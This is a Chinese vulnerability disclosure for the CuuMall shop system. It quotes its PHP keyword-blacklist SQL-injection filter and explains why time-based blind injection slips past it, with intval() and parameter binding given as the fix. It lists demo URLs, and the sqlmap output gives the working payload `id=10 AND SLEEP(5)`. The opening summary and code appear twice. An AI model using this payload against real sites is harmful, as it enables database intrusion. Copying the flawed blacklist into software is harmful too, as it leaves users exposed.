### 简要描述: CuuMall商城系统设计缺陷整站注射 ### 详细说明: http://demo.cuumall.com/index.php/home/detail/index?id=323 http://demo.cuumall.com/index.php/home/new/cxview/id/7 系统sql注入过滤: ``` public function inject_checksql( ) { $bad_str = "select|insert|update|delete|'|/*|*|../|./|union|into|load_file|outfile|mid|script"; $bad_Array = explode( "|", $bad_str ); foreach ( $bad_Array as $bad_a ) { foreach ( $_GET as $g ) { if ( 0 < substr_count( strtolower( $g ), $bad_a ) ) { $this->assign( "waitSecond", 3 ); $this->assign( "msgTitle", "非法注入" ); $this->assign( "jumpUrl", "__APP__" ); $this->error( "请不要进行非法注入" ); exit( ); break; } } } foreach ( $bad_Array as $bad_a ) { foreach ( $_POST as $p ) { if ( 0 < substr_count( strtolower( $p ), $bad_a ) ) { $this->assign( "waitSecond", 3 ); $this->assign( "msgTitle", "非法注入" ); $this->assign( "jumpUrl", "__APP__" ); $this->error( "请不要进行非法注入" ); exit( ); break; } } } foreach ( $bad_Array as $bad_a ) { foreach ( $_COOKIE as $co ) { if ( 0 < substr_count( strtolower(...
### 简要描述

CuuMall商城系统设计缺陷，整站 SQL 注射（关键字黑名单过滤可被时间盲注绕过）

### 详细说明

受影响页面示例：

- http://demo.cuumall.com/index.php/home/detail/index?id=323
- http://demo.cuumall.com/index.php/home/new/cxview/id/7

系统的 SQL 注入过滤函数：

```php
public function inject_checksql( )
{
    $bad_str = "select|insert|update|delete|'|/*|*|../|./|union|into|load_file|outfile|mid|script";
    $bad_Array = explode( "|", $bad_str );
    foreach ( $bad_Array as $bad_a ) {
        foreach ( $_GET as $g ) {
            if ( 0 < substr_count( strtolower( $g ), $bad_a ) ) {
                $this->assign( "waitSecond", 3 );
                $this->assign( "msgTitle", "非法注入" );
                $this->assign( "jumpUrl", "__APP__" );
                $this->error( "请不要进行非法注入" );
                exit( );
                break;
            }
        }
    }
    foreach ( $bad_Array as $bad_a ) {
        foreach ( $_POST as $p ) {
            if ( 0 < substr_count( strtolower( $p ), $bad_a ) ) {
                $this->assign( "waitSecond", 3 );
                $this->assign( "msgTitle", "非法注入" );
                $this->assign( "jumpUrl", "__APP__" );
                $this->error( "请不要进行非法注入" );
                exit( );
                break;
            }
        }
    }
    foreach ( $bad_Array as $bad_a ) {
        foreach ( $_COOKIE as $co ) {
            if ( 0 < substr_count( strtolower( $co ), $bad_a ) ) {
                $this->assign( "waitSecond", 3 );
                $this->assign( "msgTitle", "非法注入" );
                $this->assign( "jumpUrl", "__APP__" );
                $this->error( "请不要进行非法注入" );
                exit( );
                break;
            }
        }
    }
}
```

明显忽略了盲注。

问题分析：这是一个纯关键字黑名单，只拦截 `select`、`union`、单引号、`/*` 等子串；`and`、`or`、`sleep`、`benchmark`、`=` 以及括号都不在列表中，因此下文 sqlmap 使用的 `id=10 AND SLEEP(5)` 这类时间盲注 payload 可以原样通过 `$_GET`、`$_POST`、`$_COOKIE` 三轮检查，而 `id` 在拼入 SQL 之前也没有任何 `intval()` 或参数绑定。此外该检查只对三个超全局变量的一层值调用 `strtolower()`，数组型参数（如 `id[]=`）以及 HTTP 头等其它输入来源是否被覆盖无法从这段代码确认（推测未覆盖，需在实际环境验证）；`exit( )` 之后的 `break` 永远不会执行，属于无效代码。正确的修复应当放在数据访问层：整型参数强制 `intval()`，字符串参数使用预处理语句 / 参数绑定，而不是依赖关键字黑名单。

### 漏洞证明

[<img src="https://images.seebug.org/upload/201410/14163749fc7da7f461350793ec9e496ff20909e0.jpg" alt="Capture.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/14163749fc7da7f461350793ec9e496ff20909e0.jpg)

[<img src="https://images.seebug.org/upload/201410/141638181922eca1d4c7f439f8c53f4aca7ed2b8.jpg" alt="Capture.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/141638181922eca1d4c7f439f8c53f4aca7ed2b8.jpg)

sqlmap 输出（GET 参数 `id`，时间盲注）：

```
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=10 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
```